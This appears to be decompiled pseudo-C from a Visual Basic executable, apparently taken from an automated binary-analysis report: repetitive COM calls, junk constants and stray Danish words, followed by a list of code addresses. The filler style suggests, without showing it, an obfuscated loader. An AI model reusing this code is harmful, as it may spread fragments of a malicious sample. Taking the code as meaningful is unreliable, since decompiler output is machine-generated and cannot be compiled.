                  				_t826 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t822,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x2fc))( *_v396));
                  				asm("fclex");
                  				_v272 = _t826;
                  				if(_v272 >= 0) {
                  					_v400 = _v400 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b05c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v400 = _t826;
                  				}
                  				if( *0x410010 != 0) {
                  					_v404 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v404 = 0x410010;
                  				}
                  				_t830 =  &_v108;
                  				L004013CC();
                  				_v276 = _t830;
                  				_t834 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v96, _t830,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
                  				asm("fclex");
                  				_v280 = _t834;
                  				if(_v280 >= 0) {
                  					_v408 = _v408 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b06c);
                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v408 = _t834;
                  				}
                  				if( *0x410010 != 0) {
                  					_v412 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v412 = 0x410010;
                  				}
                  				_t1178 =  *((intOrPtr*)( *_v412));
                  				_t838 =  &_v112;
                  				L004013CC();
                  				_v284 = _t838;
                  				_t842 =  *((intOrPtr*)( *_v284 + 0xe8))(_v284,  &_v232, _t838,  *((intOrPtr*)(_t1178 + 0x31c))( *_v412));
                  				asm("fclex");
                  				_v288 = _t842;
                  				if(_v288 >= 0) {
                  					_v416 = _v416 & 0x00000000;
                  				} else {
                  					_push(0xe8);
                  					_push(0x40b07c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v416 = _t842;
                  				}
                  				_v344 = _v96;
                  				_v96 = _v96 & 0x00000000;
                  				_v128 = _v344;
                  				_v136 = 8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *_t1289 =  *0x4011c0;
                  				_t848 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _v92, _t1178, _t1178, 0x10, 0x514f93, _v232);
                  				_v292 = _t848;
                  				if(_v292 >= 0) {
                  					_v420 = _v420 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v292);
                  					L004013D8();
                  					_v420 = _t848;
                  				}
                  				L00401462();
                  				_push( &_v112);
                  				_push( &_v108);
                  				_push( &_v104);
                  				_push(3);
                  				L004013C6();
                  				_t1290 = _t1289 + 0x10;
                  				L00401450();
                  				if( *0x410010 != 0) {
                  					_v424 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v424 = 0x410010;
                  				}
                  				_t855 =  &_v104;
                  				L004013CC();
                  				_v268 = _t855;
                  				_t859 =  *((intOrPtr*)( *_v268 + 0xf0))(_v268,  &_v108, _t855,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
                  				asm("fclex");
                  				_v272 = _t859;
                  				if(_v272 >= 0) {
                  					_v428 = _v428 & 0x00000000;
                  				} else {
                  					_push(0xf0);
                  					_push(0x40b06c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v428 = _t859;
                  				}
                  				if( *0x410010 != 0) {
                  					_v432 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v432 = 0x410010;
                  				}
                  				_t863 =  &_v112;
                  				L004013CC();
                  				_v276 = _t863;
                  				_t867 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v92, _t863,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x31c))( *_v432));
                  				asm("fclex");
                  				_v280 = _t867;
                  				if(_v280 >= 0) {
                  					_v436 = _v436 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b07c);
                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v436 = _t867;
                  				}
                  				if( *0x410010 != 0) {
                  					_v440 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v440 = 0x410010;
                  				}
                  				_t871 =  &_v116;
                  				L004013CC();
                  				_v284 = _t871;
                  				_t875 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v220, _t871,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
                  				asm("fclex");
                  				_v288 = _t875;
                  				if(_v288 >= 0) {
                  					_v444 = _v444 & 0x00000000;
                  				} else {
                  					_push(0x128);
                  					_push(0x40b05c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v444 = _t875;
                  				}
                  				if( *0x410010 != 0) {
                  					_v448 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v448 = 0x410010;
                  				}
                  				_t1192 =  *((intOrPtr*)( *_v448));
                  				_t879 =  &_v120;
                  				L004013CC();
                  				_v292 = _t879;
                  				_t883 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t879,  *((intOrPtr*)(_t1192 + 0x300))( *_v448));
                  				asm("fclex");
                  				_v296 = _t883;
                  				if(_v296 >= 0) {
                  					_v452 = _v452 & 0x00000000;
                  				} else {
                  					_push(0x1dc);
                  					_push(0x40b05c);
                  					_push(_v292);
                  					_push(_v296);
                  					L004013D8();
                  					_v452 = _t883;
                  				}
                  				_v348 = _v96;
                  				_v96 = _v96 & 0x00000000;
                  				_v160 = _v348;
                  				_v168 = 8;
                  				_v176 = 0x5a42e0;
                  				_v184 = 3;
                  				_v232 = 0x3554e3;
                  				_v228 = 0x17dd;
                  				_v224 = _v220;
                  				_v352 = _v92;
                  				_v92 = _v92 & 0x00000000;
                  				_v144 = _v352;
                  				_v152 = 8;
                  				_v356 = _v108;
                  				_v108 = _v108 & 0x00000000;
                  				_v128 = _v356;
                  				_v136 = 9;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_v240 =  *0x4011bc;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v136, 0x10,  &_v224, _t1192,  &_v228, L"Underbevidsthed",  &_v232, 0x10,  &_v168);
                  				L004013C6();
                  				L00401432();
                  				_t1292 = _t1290 + 0x24;
                  				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v136, 3,  &_v136,  &_v152,  &_v168, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                  				L004013C0();
                  				if( *0x410010 != 0) {
                  					_v456 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v456 = 0x410010;
                  				}
                  				_t1196 =  *((intOrPtr*)( *_v456));
                  				_t915 =  &_v104;
                  				L004013CC();
                  				_v268 = _t915;
                  				_t919 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t915,  *((intOrPtr*)(_t1196 + 0x304))( *_v456));
                  				asm("fclex");
                  				_v272 = _t919;
                  				if(_v272 >= 0) {
                  					_v460 = _v460 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b05c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v460 = _t919;
                  				}
                  				_v192 = 0x7cf5f3;
                  				_v200 = 3;
                  				_v220 = 0x74c1;
                  				_v176 = L"overstiges";
                  				_v184 = 8;
                  				_v360 = _v92;
                  				_v92 = _v92 & 0x00000000;
                  				_v128 = _v360;
                  				_v136 = 8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *_t1292 =  *0x4011b8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t929 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10, 0x10, _t1196,  &_v220, 0x39ff, 0x10, 0x667a4db0, 0x5b07,  &_v256);
                  				_v276 = _t929;
                  				if(_v276 >= 0) {
                  					_v464 = _v464 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v276);
                  					L004013D8();
                  					_v464 = _t929;
                  				}
                  				_v88 = _v256;
                  				L004013D2();
                  				L00401450();
                  				if( *0x410010 != 0) {
                  					_v468 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v468 = 0x410010;
                  				}
                  				_t933 =  &_v104;
                  				L004013CC();
                  				_v268 = _t933;
                  				_t937 =  *((intOrPtr*)( *_v268 + 0xa0))(_v268,  &_v220, _t933,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x314))( *_v468));
                  				asm("fclex");
                  				_v272 = _t937;
                  				if(_v272 >= 0) {
                  					_v472 = _v472 & 0x00000000;
                  				} else {
                  					_push(0xa0);
                  					_push(0x40b06c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v472 = _t937;
                  				}
                  				if( *0x410010 != 0) {
                  					_v476 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v476 = 0x410010;
                  				}
                  				_t941 =  &_v108;
                  				L004013CC();
                  				_v276 = _t941;
                  				_t945 =  *((intOrPtr*)( *_v276 + 0x1a0))(_v276,  &_v224, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x304))( *_v476));
                  				asm("fclex");
                  				_v280 = _t945;
                  				if(_v280 >= 0) {
                  					_v480 = _v480 & 0x00000000;
                  				} else {
                  					_push(0x1a0);
                  					_push(0x40b05c);
                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v480 = _t945;
                  				}
                  				if( *0x410010 != 0) {
                  					_v484 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v484 = 0x410010;
                  				}
                  				_t949 =  &_v112;
                  				L004013CC();
                  				_v284 = _t949;
                  				_t953 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v232, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x318))( *_v484));
                  				asm("fclex");
                  				_v288 = _t953;
                  				if(_v288 >= 0) {
                  					_v488 = _v488 & 0x00000000;
                  				} else {
                  					_push(0x128);
                  					_push(0x40b06c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v488 = _t953;
                  				}
                  				if( *0x410010 != 0) {
                  					_v492 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v492 = 0x410010;
                  				}
                  				_t1210 =  *((intOrPtr*)( *_v492));
                  				_t957 =  &_v116;
                  				L004013CC();
                  				_v292 = _t957;
                  				_t961 =  *((intOrPtr*)( *_v292 + 0xf0))(_v292,  &_v120, _t957,  *((intOrPtr*)(_t1210 + 0x318))( *_v492));
                  				asm("fclex");
                  				_v296 = _t961;
                  				if(_v296 >= 0) {
                  					_v496 = _v496 & 0x00000000;
                  				} else {
                  					_push(0xf0);
                  					_push(0x40b06c);
                  					_push(_v292);
                  					_push(_v296);
                  					L004013D8();
                  					_v496 = _t961;
                  				}
                  				L004013BA();
                  				_t1293 = _t1292 + 0x10;
                  				_t963 =  &_v136;
                  				L004013B4();
                  				_v240 = _t963;
                  				_v236 = 0x6b5bc3;
                  				_v256 =  *0x4011b0;
                  				_v412 =  *0x4011a8;
                  				_t969 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x31f0, _v220, _v224,  &_v236, _v232, _t1210, _t1210,  &_v240, 0x60d, 0x5cfc, _t963,  &_v136, _v120, 0, 0);
                  				_v300 = _t969;
                  				if(_v300 >= 0) {
                  					_v500 = _v500 & 0x00000000;
                  				} else {
                  					_push(0x704);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v300);
                  					L004013D8();
                  					_v500 = _t969;
                  				}
                  				L004013C6();
                  				_t1294 = _t1293 + 0x18;
                  				L00401450();
                  				_t977 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 5,  &_v104,  &_v108,  &_v112,  &_v116,  &_v120);
                  				asm("fclex");
                  				_v268 = _t977;
                  				if(_v268 >= 0) {
                  					_v504 = _v504 & 0x00000000;
                  				} else {
                  					_push(0x2b4);
                  					_push(0x40ad24);
                  					_push(_a4);
                  					_push(_v268);
                  					L004013D8();
                  					_v504 = _t977;
                  				}
                  				_v176 = 1;
                  				_v184 = 2;
                  				_v192 = 0x5f7a;
                  				_v200 = 2;
                  				_v208 = _v208 & 0x00000000;
                  				_v216 = 2;
                  				_push( &_v184);
                  				_push( &_v200);
                  				_push( &_v216);
                  				_push( &_v332);
                  				_push( &_v316);
                  				_t983 =  &_v40;
                  				_push(_t983);
                  				L004013AE();
                  				_v364 = _t983;
                  				while(_v364 != 0) {
                  					_v176 = L"RRETS";
                  					_v184 = 8;
                  					L004013E4();
                  					_v264 =  *0x4011a0;
                  					_v256 = 0x418e7d50;
                  					_v252 = 0x5af3;
                  					_t989 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v256, 0x4d7a,  &_v264, 0x6e4acb,  &_v136);
                  					_v268 = _t989;
                  					if(_v268 >= 0) {
                  						_v508 = _v508 & 0x00000000;
                  					} else {
                  						_push(0x708);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v268);
                  						L004013D8();
                  						_v508 = _t989;
                  					}
                  					L00401450();
                  					if( *0x410010 != 0) {
                  						_v512 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v512 = 0x410010;
                  					}
                  					_t993 =  &_v104;
                  					L004013CC();
                  					_v268 = _t993;
                  					_t997 =  *((intOrPtr*)( *_v268 + 0x68))(_v268,  &_v232, _t993,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x314))( *_v512));
                  					asm("fclex");
                  					_v272 = _t997;
                  					if(_v272 >= 0) {
                  						_v516 = _v516 & 0x00000000;
                  					} else {
                  						_push(0x68);
                  						_push(0x40b06c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v516 = _t997;
                  					}
                  					if( *0x410010 != 0) {
                  						_v520 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v520 = 0x410010;
                  					}
                  					_t1001 =  &_v108;
                  					L004013CC();
                  					_v276 = _t1001;
                  					_t1005 =  *((intOrPtr*)( *_v276 + 0x90))(_v276,  &_v220, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x31c))( *_v520));
                  					asm("fclex");
                  					_v280 = _t1005;
                  					if(_v280 >= 0) {
                  						_v524 = _v524 & 0x00000000;
                  					} else {
                  						_push(0x90);
                  						_push(0x40b07c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v524 = _t1005;
                  					}
                  					if( *0x410010 != 0) {
                  						_v528 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v528 = 0x410010;
                  					}
                  					_t1009 =  &_v112;
                  					L004013CC();
                  					_v284 = _t1009;
                  					_t1013 =  *((intOrPtr*)( *_v284 + 0xf8))(_v284,  &_v92, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x308))( *_v528));
                  					asm("fclex");
                  					_v288 = _t1013;
                  					if(_v288 >= 0) {
                  						_v532 = _v532 & 0x00000000;
                  					} else {
                  						_push(0xf8);
                  						_push(0x40b05c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v532 = _t1013;
                  					}
                  					if( *0x410010 != 0) {
                  						_v536 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v536 = 0x410010;
                  					}
                  					_t1017 =  &_v116;
                  					L004013CC();
                  					_v292 = _t1017;
                  					_t1021 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t1017,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
                  					asm("fclex");
                  					_v296 = _t1021;
                  					if(_v296 >= 0) {
                  						_v540 = _v540 & 0x00000000;
                  					} else {
                  						_push(0x1dc);
                  						_push(0x40b05c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v540 = _t1021;
                  					}
                  					_v144 = 0x85aaa;
                  					_v152 = 3;
                  					_v192 = 0x791fc7;
                  					_v200 = 3;
                  					_v368 = _v96;
                  					_v96 = _v96 & 0x00000000;
                  					_v128 = _v368;
                  					_v136 = 8;
                  					_v240 =  *0x401198;
                  					_v372 = _v92;
                  					_v92 = _v92 & 0x00000000;
                  					L0040145C();
                  					_v256 =  *0x401190;
                  					_v236 = _v232;
                  					_v176 = 0x51ddc9;
                  					_v184 = 3;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_v592 =  *0x401188;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x10,  &_v236, _v220,  &_v256,  &_v100,  &_v100,  &_v240,  &_v136, 0x10,  &_v152);
                  					L00401462();
                  					_push( &_v116);
                  					_push( &_v112);
                  					_push( &_v108);
                  					_push( &_v104);
                  					_push(4);
                  					L004013C6();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push(2);
                  					L00401432();
                  					_t1296 = _t1294 + 0x20;
                  					if( *0x410010 != 0) {
                  						_v544 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v544 = 0x410010;
                  					}
                  					_t1046 =  &_v104;
                  					L004013CC();
                  					_v268 = _t1046;
                  					_t1050 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t1046,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x308))( *_v544));
                  					asm("fclex");
                  					_v272 = _t1050;
                  					if(_v272 >= 0) {
                  						_v548 = _v548 & 0x00000000;
                  					} else {
                  						_push(0x48);
                  						_push(0x40b05c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v548 = _t1050;
                  					}
                  					if( *0x410010 != 0) {
                  						_v552 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v552 = 0x410010;
                  					}
                  					_t1054 =  &_v108;
                  					L004013CC();
                  					_v276 = _t1054;
                  					_t1058 =  *((intOrPtr*)( *_v276 + 0xe8))(_v276,  &_v220, _t1054,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x318))( *_v552));
                  					asm("fclex");
                  					_v280 = _t1058;
                  					if(_v280 >= 0) {
                  						_v556 = _v556 & 0x00000000;
                  					} else {
                  						_push(0xe8);
                  						_push(0x40b06c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v556 = _t1058;
                  					}
                  					if( *0x410010 != 0) {
                  						_v560 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v560 = 0x410010;
                  					}
                  					_t1062 =  &_v112;
                  					L004013CC();
                  					_v284 = _t1062;
                  					_t1066 =  *((intOrPtr*)( *_v284 + 0x58))(_v284,  &_v116, _t1062,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x31c))( *_v560));
                  					asm("fclex");
                  					_v288 = _t1066;
                  					if(_v288 >= 0) {
                  						_v564 = _v564 & 0x00000000;
                  					} else {
                  						_push(0x58);
                  						_push(0x40b07c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v564 = _t1066;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push(_v116);
                  					_push( &_v152);
                  					L004013BA();
                  					_t1297 = _t1296 + 0x10;
                  					if( *0x410010 != 0) {
                  						_v568 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v568 = 0x410010;
                  					}
                  					_t1239 =  *((intOrPtr*)( *_v568));
                  					_t1071 =  &_v120;
                  					L004013CC();
                  					_v292 = _t1071;
                  					_t1075 =  *((intOrPtr*)( *_v292 + 0x60))(_v292,  &_v232, _t1071,  *((intOrPtr*)(_t1239 + 0x314))( *_v568));
                  					asm("fclex");
                  					_v296 = _t1075;
                  					if(_v296 >= 0) {
                  						_v572 = _v572 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b06c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v572 = _t1075;
                  					}
                  					_v240 = _v232;
                  					_t1077 =  &_v152;
                  					L004013B4();
                  					_v236 = _t1077;
                  					_v376 = _v92;
                  					_v92 = _v92 & 0x00000000;
                  					_v128 = _v376;
                  					_v136 = 8;
                  					_v264 =  *0x401180;
                  					_v256 = 0x754c8ed0;
                  					_v252 = 0x5afc;
                  					 *_t1297 =  *0x401178;
                  					_t1088 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x2e2313c0, 0x5af8,  &_v256,  &_v264,  &_v136, 0x683d, _v220,  &_v236, _t1239, _t1239,  &_v240,  &_v244, _t1077);
                  					_v300 = _t1088;
                  					if(_v300 >= 0) {
                  						_v576 = _v576 & 0x00000000;
                  					} else {
                  						_push(0x70c);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v300);
                  						L004013D8();
                  						_v576 = _t1088;
                  					}
                  					_v80 = _v244;
                  					_push( &_v116);
                  					_push( &_v120);
                  					_push( &_v112);
                  					_push( &_v108);
                  					_push( &_v104);
                  					_push(5);
                  					L004013C6();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push(2);
                  					L00401432();
                  					_t1299 = _t1297 + 0x24;
                  					if( *0x410010 != 0) {
                  						_v580 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v580 = 0x410010;
                  					}
                  					_t1100 =  &_v104;
                  					L004013CC();
                  					_v268 = _t1100;
                  					_t1104 =  *((intOrPtr*)( *_v268 + 0x170))(_v268,  &_v108, _t1100,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
                  					asm("fclex");
                  					_v272 = _t1104;
                  					if(_v272 >= 0) {
                  						_v584 = _v584 & 0x00000000;
                  					} else {
                  						_push(0x170);
                  						_push(0x40b05c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v584 = _t1104;
                  					}
                  					if( *0x410010 != 0) {
                  						_v588 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v588 = 0x410010;
                  					}
                  					_t1108 =  &_v112;
                  					L004013CC();
                  					_v276 = _t1108;
                  					_t1112 =  *((intOrPtr*)( *_v276 + 0x110))(_v276,  &_v232, _t1108,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x318))( *_v588));
                  					asm("fclex");
                  					_v280 = _t1112;
                  					if(_v280 >= 0) {
                  						_v592 = _v592 & 0x00000000;
                  					} else {
                  						_push(0x110);
                  						_push(0x40b06c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v592 = _t1112;
                  					}
                  					if( *0x410010 != 0) {
                  						_v596 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v596 = 0x410010;
                  					}
                  					_t1116 =  &_v116;
                  					L004013CC();
                  					_v284 = _t1116;
                  					_t1120 =  *((intOrPtr*)( *_v284 + 0x70))(_v284,  &_v236, _t1116,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x318))( *_v596));
                  					asm("fclex");
                  					_v288 = _t1120;
                  					if(_v288 >= 0) {
                  						_v600 = _v600 & 0x00000000;
                  					} else {
                  						_push(0x70);
                  						_push(0x40b06c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v600 = _t1120;
                  					}
                  					if( *0x410010 != 0) {
                  						_v604 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v604 = 0x410010;
                  					}
                  					_t1251 =  *((intOrPtr*)( *_v604));
                  					_t1124 =  &_v120;
                  					L004013CC();
                  					_v292 = _t1124;
                  					_t1128 =  *((intOrPtr*)( *_v292 + 0x128))(_v292,  &_v240, _t1124,  *((intOrPtr*)(_t1251 + 0x318))( *_v604));
                  					asm("fclex");
                  					_v296 = _t1128;
                  					if(_v296 >= 0) {
                  						_v608 = _v608 & 0x00000000;
                  					} else {
                  						_push(0x128);
                  						_push(0x40b06c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v608 = _t1128;
                  					}
                  					_v248 = _v240;
                  					_v244 =  *0x401170;
                  					_v176 = _v232;
                  					_v184 = 3;
                  					_v380 = _v108;
                  					_v108 = _v108 & 0x00000000;
                  					_v128 = _v380;
                  					_v136 = 9;
                  					 *_t1299 = _v236;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *_t1299 =  *0x40116c;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x10, 0x5d72, _t1251, 0x10,  &_v244, _t1251,  &_v248);
                  					L004013C6();
                  					_t1294 = _t1299 + 0x14;
                  					L00401450();
                  					_t1147 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v136, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                  					_v268 = _t1147;
                  					if(_v268 >= 0) {
                  						_v612 = _v612 & 0x00000000;
                  					} else {
                  						_push(0x710);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v268);
                  						L004013D8();
                  						_v612 = _t1147;
                  					}
                  					L004013C0();
                  					_push( &_v332);
                  					_push( &_v316);
                  					_t1150 =  &_v40;
                  					_push(_t1150);
                  					L004013A8();
                  					_v364 = _t1150;
                  				}
                  				 *((intOrPtr*)( *_a4 + 0x714))(_a4);
                  				_v8 = 0;
                  				asm("wait");
                  				_push(E0040DB73);
                  				_push( &_v332);
                  				_t1155 =  &_v316;
                  				_push(_t1155);
                  				_push(2);
                  				L00401432();
                  				L00401450();
                  				L00401450();
                  				L00401450();
                  				return _t1155;
                  			}










































































































































































































                  0x0040bfcd
                  0x0040bfdc
                  0x0040bfe8
                  0x0040bff0
                  0x0040bff3
                  0x0040c000
                  0x0040c009
                  0x0040c014
                  0x0040c017
                  0x0040c021
                  0x0040c037
                  0x0040c042
                  0x0040c049
                  0x0040c04a
                  0x0040c04f
                  0x0040c059
                  0x0040c069
                  0x0040c06a
                  0x0040c070
                  0x0040c071
                  0x0040c076
                  0x0040c083
                  0x0040c08a
                  0x0040c08b
                  0x0040c08d
                  0x0040c092
                  0x0040c09e
                  0x0040c0ab
                  0x0040c0c8
                  0x0040c0ad
                  0x0040c0ad
                  0x0040c0b2
                  0x0040c0b7
                  0x0040c0bc
                  0x0040c0bc
                  0x0040c0da
                  0x0040c0f2
                  0x0040c0f5
                  0x0040c0f7
                  0x0040c104
                  0x0040c126
                  0x0040c106
                  0x0040c106
                  0x0040c108
                  0x0040c10d
                  0x0040c113
                  0x0040c119
                  0x0040c11e
                  0x0040c11e
                  0x0040c130
                  0x0040c14d
                  0x0040c150
                  0x0040c152
                  0x0040c15f
                  0x0040c181
                  0x0040c161
                  0x0040c161
                  0x0040c163
                  0x0040c168
                  0x0040c16e
                  0x0040c174
                  0x0040c179
                  0x0040c179
                  0x0040c18f
                  0x0040c196
                  0x0040c196
                  0x0040c1a2
                  0x0040c1bf
                  0x0040c1a4
                  0x0040c1a4
                  0x0040c1a9
                  0x0040c1ae
                  0x0040c1b3
                  0x0040c1b3
                  0x0040c1e3
                  0x0040c1e7
                  0x0040c1ec
                  0x0040c204
                  0x0040c207
                  0x0040c209
                  0x0040c216
                  0x0040c238
                  0x0040c218
                  0x0040c218
                  0x0040c21a
                  0x0040c21f
                  0x0040c225
                  0x0040c22b
                  0x0040c230
                  0x0040c230
                  0x0040c246
                  0x0040c263
                  0x0040c248
                  0x0040c248
                  0x0040c24d
                  0x0040c252
                  0x0040c257
                  0x0040c257
                  0x0040c287
                  0x0040c28b
                  0x0040c290
                  0x0040c2a8
                  0x0040c2ab
                  0x0040c2ad
                  0x0040c2ba
                  0x0040c2dc
                  0x0040c2bc
                  0x0040c2bc
                  0x0040c2be
                  0x0040c2c3
                  0x0040c2c9
                  0x0040c2cf
                  0x0040c2d4
                  0x0040c2d4
                  0x0040c2ea
                  0x0040c307
                  0x0040c2ec
                  0x0040c2ec
                  0x0040c2f1
                  0x0040c2f6
                  0x0040c2fb
                  0x0040c2fb
                  0x0040c321
                  0x0040c32b
                  0x0040c32f
                  0x0040c334
                  0x0040c34f
                  0x0040c355
                  0x0040c357
                  0x0040c364
                  0x0040c389
                  0x0040c366
                  0x0040c366
                  0x0040c36b
                  0x0040c370
                  0x0040c376
                  0x0040c37c
                  0x0040c381
                  0x0040c381
